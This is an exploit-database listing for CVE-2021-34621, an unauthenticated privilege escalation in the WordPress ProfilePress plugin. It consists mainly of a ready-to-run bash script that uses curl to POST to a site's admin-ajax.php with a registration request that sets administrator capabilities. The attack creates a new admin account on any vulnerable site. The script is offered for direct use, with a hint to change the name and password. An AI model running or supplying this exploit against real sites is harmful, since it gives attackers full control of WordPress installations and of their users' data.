Exploit for WordPress ProfilePress 3.1.3 Privilege Escalation CVE-2021-34621

Name: Exploit for WordPress ProfilePress 3.1.3 Privilege Escalation CVE-2021-34621
Rating: 5 (153 reviews)

2021-08-31 | CVSS 7.5

## https://sploitus.com/exploit?id=PACKETSTORM:163973
# Exploit Title: WordPress Plugin ProfilePress 3.1.3 - Privilege Escalation (Unauthenticated)  
# Date: 23-08-2021  
# Exploit Author: Numan Rajkotiya  
# Vendor Homepage: https://profilepress.net/  
# Software Link: https://downloads.wordpress.org/plugin/wp-user-avatar.3.0.zip  
# Version: [1] ProfilePress (Formerly WP User Avatar) 3.0 - 3.13  
[2] WordPress 4.7 or higher  
# Tested on: ProfilePress 3.0, Apache 2.4, and Windows Build 19043.928  
# CVE : CVE-2021-34621  
  
#!/bin/bash  
  
# Exploit for WordPress Plugin ProfilePress 3.0 - 3.1.3   
# Change the name and password as per your requirement.  
  
URL=$1  
  
curl -X POST $URL"/wp-admin/admin-ajax.php" \  
-H "Content-Type: application/x-www-form-urlencoded" \  
-d "reg_username=numan" \  
-d "reg_email=pwned@numan.com" \  
-d "reg_password=numan" \  
-d "reg_password_present=true" \  
-d "wp_capabilities[administrator]=1" \  
-d "reg_first_name=pwned" \  
-d "reg_last_name=numan" \  
-d "action=pp_ajax_signup"